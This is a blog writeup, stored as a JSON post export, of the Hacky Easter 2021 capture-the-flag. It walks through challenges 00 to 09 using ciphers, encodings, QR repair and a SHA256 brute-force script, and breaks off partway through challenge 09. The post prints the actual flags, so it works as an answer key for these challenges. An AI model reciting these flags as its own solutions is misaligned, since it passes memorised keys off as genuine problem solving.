{"id":2282,"date":"2021-05-13T01:37:35","date_gmt":"2021-05-13T01:37:35","guid":{"rendered":"https:\/\/devel0pment.de\/?p=2282"},"modified":"2021-05-13T17:51:53","modified_gmt":"2021-05-13T17:51:53","slug":"hacky-easter-2021-writeup","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=2282","title":{"rendered":"Hacky Easter 2021 writeup"},"content":{"rendered":"\r\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"789\" height=\"64\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2021\/04\/he21_title.png\" alt=\"\" class=\"wp-image-2399\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2021\/04\/he21_title.png 789w, https:\/\/devel0pment.de\/wp-content\/uploads\/2021\/04\/he21_title-300x24.png 300w, https:\/\/devel0pment.de\/wp-content\/uploads\/2021\/04\/he21_title-768x62.png 768w\" sizes=\"(max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\r\n\r\n\r\n\r\n<style>\r\n.hl {\r\n  color:#2222ff;\r\n  font-family:\"Courier 10 Pitch\", Courier, monospace;\r\n  font-weight:bold;\r\n}\r\n\r\n.hl2 {\r\n  color:#ff0000;\r\n}\r\n\r\n.bold {\r\n    font-weight:bold;\r\n}\r\n\r\n\r\n.tblChlg {\r\n  border:none;\r\n  padding:10px 10px 10px 0px;\r\n}\r\n\r\n.tblChlg tr {\r\n  border:none;\r\n}\r\n\r\n.tblChlgInner {\r\n  border:none;\r\n}\r\n\r\n.tblChlgInner tr {\r\n  border:none;\r\n}\r\n\r\n.tblChlgInner td {\r\n  padding:5px;\r\n}\r\n\r\n.tblChlgInner tr td:first-child {\r\n  font-weight:bold;\r\n  width:20%;\r\n}\r\n\r\n.noob {\r\n    background-color:#69bbe9;\r\n    color:#ffffff;\r\n    padding:5px;\r\n}\r\n\r\n.easy {\r\n    background-color:#8fe699;\r\n    color:#000000;\r\n    padding:5px;\r\n}\r\n\r\n.medium {\r\n    background-color:#e6cb39;\r\n    color:#000000;\r\n    padding:5px;\r\n}\r\n\r\n.hard {\r\n    background-color:#e68f8f;\r\n    color:#000000;\r\n    padding:5px;\r\n}\r\n\r\npre {\r\n    white-space:pre-wrap;\r\n    word-break: 
break-word;\r\n}\r\n\r\n.fake_link {\r\n    color:#0000ff;\r\n    text-decoration:underline;\r\n}\r\n<\/style>\r\n\r\n\r\n\r\n<p><span class=\"hl\">HackyEaster<\/span> was awesome again. From a technical point of view there weren&#8217;t too many new things, but the creativity of the provided challenges made it really fun. Including the little teaser challenge there were a total of <span class=\"hl\">37<\/span> challenges. These challenges were divided into different levels. You could only proceed to the next level if you had earned enough points in the current level. I really liked that new idea.<\/p>\r\n\r\n\r\n\r\n<!--more-->\r\n\r\n\r\n\r\n<p style=\"font-size:10px\">\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_00\">HE21.00 Teaser Challenge<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_01\">HE21.01 Intro<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_02\">HE21.02 Basement Cat<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_03\">HE21.03 Easy One<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_04\">HE21.04 Beehive<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_05\">HE21.05 Unicorn<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_06\">HE21.06 Mystical Symbols<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_07\">HE21.07 Caesar&#8217;s Meme<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_08\">HE21.08 Sunshine<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_09\">HE21.09 Cafe Shop<\/a><\/span>\r\n<span 
style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_10\">HE21.10 Ghost in a Shell 1<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_11\">HE21.11 Hidden<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_12\">HE21.12 Ansi Art<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_13\">HE21.13 No No No<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_14\">HE21.14 Haxxor what?<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_15\">HE21.15 Social Checker<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_16\">HE21.16 LOTL<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_17\">HE21.17 Digizzled<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_18\">HE21.18 Bunny Beat<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_19\">HE21.19 &#x1F608;<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_20\">HE21.20 Run Me, Baby!<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_21\">HE21.21 Memeory 3.0 &#8211; The Final<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_22\">HE21.22 46 Apes<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_23\">HE21.23 Eggcryptor<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_24\">HE21.24 Tacocat<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" 
class=\"medium\"><a href=\"#he21_25\">HE21.25 Lots of JWTs<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_26\">HE21.26 Lost<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_27\">HE21.27 Ghost in a Shell 2<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_28\">HE21.28 Haxxor what 2?<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_29\">HE21.29 Sailor&#8217;s Knot<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_30\">HE21.30 Pix FX<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_31\">HE21.31 Hunny Bunny<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_32\">HE21.32 Two Yolks<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_33\">HE21.33 Finding Mnemo<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_34\">HE21.34 The Five Seasons<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_35\">HE21.35 The Snake<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_36\">HE21.36 Doldrums<\/a><\/span>\r\n<\/p>\r\n\r\n\r\n\r\n<style>\r\ncode {\r\n  font-family:\"Courier 10 Pitch\", Courier, monospace;\r\n  font-size:14px;\r\n  line-height:18px;\r\n  background-color:#000000;\r\n  color:#00ff00 !important;\r\n  padding:0px 10px 15px 10px;\r\n  display:block;\r\n  white-space:pre-wrap;\r\n  word-wrap:break-word;\r\n  margin-bottom:15px;\r\n}\r\n<\/style>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_00\">HE21.00 Teaser Challenge<\/h1>\r\n<table class=\"tblChlg\">\r\n<tr>\r\n<td width=\"300px\"><img 
src =\"wp-content\/uploads\/2021\/04\/he21_00_01.jpg\" width=\"300px\"\/><\/td>\r\n<\/tr>\r\n<tr><td>\r\n<pre>\r\nEd wrote you a letter containing strange symbols:\r\n\r\n<span class=\"hl\">;85)8( )\u20210\u00b68\u2020 -\u2021*3(5;)<\/span>\r\n\r\nCan you recover the message?\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe picture shows <span class=\"hl\">Edgar Allan Poe<\/span>. A little bit of googling leads to this page: <a href=\"https:\/\/www.dcode.fr\/gold-bug-poe\" rel=\"noopener noreferrer\" target=\"_blank\">Gold-Bug Cipher<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nAfter copy-pasting the message to the ciphertext field and clicking on <span class=\"hl\">decrypt<\/span>, we get the resulting plaintext:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_00_02.png\" alt=\"Decrypt\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">TEASER SOLVED CONGRATS<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_01\">HE21.01 Intro<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge1.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"noob\">1 (noob)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>50<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nWell, this is not a real challenge yet, just a quick intro. 
Some would say sanity check.\r\n\r\n<b>Event<\/b>\r\n\r\n    - The event runs until May 13, 13:37 CET.\r\n    - Please do not publish write-ups, before that.\r\n    - There's a <b>Discord<\/b> server, in case you need support.\r\n\r\n<b>Challenges<\/b>\r\n\r\n    - Challenges have difficulty <i>noob<\/i>, <i>easy<\/i>, <i>medium<\/i>, or <i>hard<\/i>.\r\n    - Some challenges have a hint - opening the hint is <b>free<\/b>.\r\n\r\n<b>Flags<\/b>\r\n\r\n    - Flag format: <span class=\"hl\">he2021{just_4n_3x4mpl3}<\/span>.\r\n    - There are no flags \/ eggs hidden in the application - please do not attack it.\r\n\r\n<b>Levels<\/b>\r\n\r\n    - With a certain amount of points scored <b>in the current level<\/b>, you level up.\r\n    - You can always go back to earlier levels.\r\n\r\nThat's it for now. Check the <b>HowTo<\/b> for more details.\r\n\r\nTime to catch the first flag now! Download the image below.\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_01_01.png\" width=\"300px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\nDownload the image. 
Things are <b>flipped<\/b> somehow.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided image can be flipped and scanned or the flag can be read directly from it in reverse order:\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{f1rst_0n3!}<\/span>.\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_02\">HE21.02 Basement Cat<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge2.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"noob\">2 (noob)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>50<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nHi, me iz <b>Base<\/b>ment Cat!\r\n\r\nHere iz flag: <span class=\"hl\">5jsnZDgv9EfFeoGXZrFurdz7MWAnK2WaPfszFadr<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nThe number on the image, is a hint! 
;)\r\n\r\nCheck out Cyber Chef.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided string <span class=\"hl\">5jsnZDgv9EfFeoGXZrFurdz7MWAnK2WaPfszFadr<\/span> is <span class=\"hl\">base58<\/span> encoded and can be decoded, for example, using <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_02_01.png\" alt=\"CyberChef\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{meow_nice_to_meet_you}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_03\">HE21.03 Easy One<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge3.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"noob\">2 (noob)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>50<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nHow did this happen? This was supposed to be a valid QR code, but some ants walked across it. Can you repair the damage?\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_03_01.png\" width=\"300px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\nA tool like paint will do to solve this one.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nSome of the areas within the QR code need to be filled with white in order to make it readable.\r\n<\/p>\r\n\r\n<p>\r\nThere is a little pitfall, because the white lines are disconnected in the middle of the image. 
After fixing this and filling the required areas with white in Paint, we get this:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_03_02.png\" alt=\"QR-Code\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{W3llThatWasQu1t33Asy}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_04\">HE21.04 Beehive<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge4.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">3 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThere's a secret code in the beehive.\r\n\r\nflag format: <span class=\"hl\">he2021{flaglower}<\/span>.\r\n\r\n<b>Lowercase<\/b> only, and no spaces!\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_04_01.png\" width=\"200px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\nKim Godgul\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nA little bit of googling reveals that the encoding used is called <span class=\"hl\">ColorHoney<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nA description can be found <a href=\"https:\/\/omniglot.com\/conscripts\/colorhoney.php\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_04_02.png\" alt=\"ColorHoney\"\/>\r\n<\/p>\r\n\r\n<p>\r\nBy decoding the individual honeycomb symbols we get the flag:\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{busybee}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_05\">HE21.05 Unicorn<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge5.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table 
class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">3 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics, Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nAin't no CTF without a unicorn!\r\n\r\ns7GvyM1RKEstKs7Mz7NVMtQzUFJIzUvO  \r\nT8nMS7dVCg1x07VQsrfj5bJJzs9LL0os  \r\nKQayFRRs0nIS0+0yUo0MjAyrS\/MMkw2K  \r\n8uIN84CiJcbGximKtTb6YBVAffpwjQA=  \r\n\r\n<b>Hint<\/b>\r\n\r\nDecode and inflate!\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nRegarding the hint, we can simply copy-paste the provided strings into <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nBy choosing <span class=\"hl\">From Base64<\/span> and <span class=\"hl\">Raw Inflate<\/span> we get the flag:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_05_01.png\" alt=\"CyberChef\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{un1c0rn_1nflat333d!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_06\">HE21.06 Mystical Symbols<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge6.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">3 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nI found these mystical symbols.\r\n\r\nWhat do they mean?\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_06_01.png\" width=\"500px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\n- Really <b>myst<\/b>ical, isn't it?\r\n- decimal to 
ascii\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nBy googling for images with <span class=\"hl\">symbols myst<\/span> we get the following picture, which looks promising:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_06_02.png\" alt=\"Symbols\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThere are 25 different symbols:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_06_03.png\" alt=\"Symbols\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWe have to decode every symbol to its corresponding number. Since the base of the alphabet is 25, we need to multiply the first number of each symbol by this base and add the second number. The resulting number can be converted to ASCII:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_06_04.png\" alt=\"Flag\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{S1rruz}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_07\">HE21.07 Caesar&#8217;s Meme<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge7.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"noob\">3 (noob)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>50<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nAs is only little known, the ancient Romans invented the memes.\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_07_01.jpg\" width=\"400px\"\/>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nWe can simply type out the text from the meme and copy-paste it to <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nBy using <span class=\"hl\">ROT13<\/span> and 
testing different values, we get a valid result for <span class=\"hl\">n = 23<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_07_02.png\" alt=\"Flag\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{imperator}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_08\">HE21.08 Sunshine<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge8.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"noob\">3 (noob)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>50<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThe rays of sunshine are right there, in front of your eyes.\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_08_01.png\" width=\"500px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\nIt's just a little puzzle.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nI used GIMP to cut out and rotate the rays in order to reconstruct the egg with the QR code:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_08_02.png\" alt=\"QR-Code\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{0h_h3llo_sunsh1ne!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_09\">HE21.09 Cafe Shop<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge9.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">4 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Web, Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThey have 
good things at the cafe shop, but I want a COLA - DECAF it must be!\r\n\r\nVisit the shop here:\r\n<span class=\"fake_link\">http:\/\/46.101.107.117:2104<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<b>Hint<\/b>\r\n\r\nThey also serve hash browns, for $256.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nOn the provided website items can be ordered:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_09_01.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nBy having a look at the source code we can see that there are three possible items:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_09_02.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe value of each item begins with an integer (e.g. <span class=\"hl\">11865457<\/span>), followed by a string (e.g. <span class=\"hl\">Vanilla Cafe<\/span>).\r\n<\/p>\r\n\r\n<p>\r\nThe relevant insight here is that the <span class=\"hl\">SHA256<\/span> hash of each value contains the name of the ordered item, spelled in hex digits:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ echo -n '11865457 Vanilla Cafe' | sha256sum\r\nf15bffb719f26892f17eea53dc7e3459<span class=\"hl2\">cafe<\/span>021bc0db2dce72429667d7aaee96  -\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ echo -n '42640575 Cherry Cola' | sha256sum \r\n36bc94f7d7c3398319f2<span class=\"hl2\">c01a<\/span>9a9c583aed66d3a5e325aafa0652ceb2bdc271cf  -\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ echo -n '80427209 Beef Jerky' | sha256sum \r\ned734b4fc622d543774121dcfb573cf53d7ddef85ebe<span class=\"hl2\">beef<\/span>9fd7cbd8bf4363c9  -\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAccording to the challenge description we have to order a <span class=\"hl\">COLA &#8211; DECAF<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThus we have to find an integer whose <span class=\"hl\">SHA256<\/span> 
contains <span class=\"hl\">c01a<\/span> and <span class=\"hl\">decaf<\/span> when followed by the string <span class=\"hl\">&#8220; Cola Decaf&#8221;<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nimport hashlib\r\n\r\n# Brute-force the integer prefix until the SHA256 hex digest of\r\n# 'N Cola Decaf' contains both 'c01a' and 'decaf'\r\ni = 0\r\n\r\nwhile True:\r\n  s = str(i)+' Cola Decaf'\r\n  m = hashlib.sha256()\r\n  m.update(s.encode())\r\n  h = m.hexdigest()\r\n  if ('c01a' in h and 'decaf' in h):\r\n    print(s)\r\n    quit()\r\n  i += 1\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script yields an appropriate input:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ .\/find_sha256.py\r\n19614073 Cola Decaf\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nBy submitting this ID our order is accepted and an image is provided:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_09_03.png\" alt=\"Burp\"\/>\r\n<\/p>\r\n\r\n<p>\r\nNow we only need to download the image &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ wget http:\/\/46.101.107.117:2104\/7ef384aa6ec128ef.png\r\n...\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_09_04.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; and scan the QR code:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ zbarimg 7ef384aa6ec128ef.png \r\nQR-Code:he2021{h3xpr3ss_urs3lf}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span 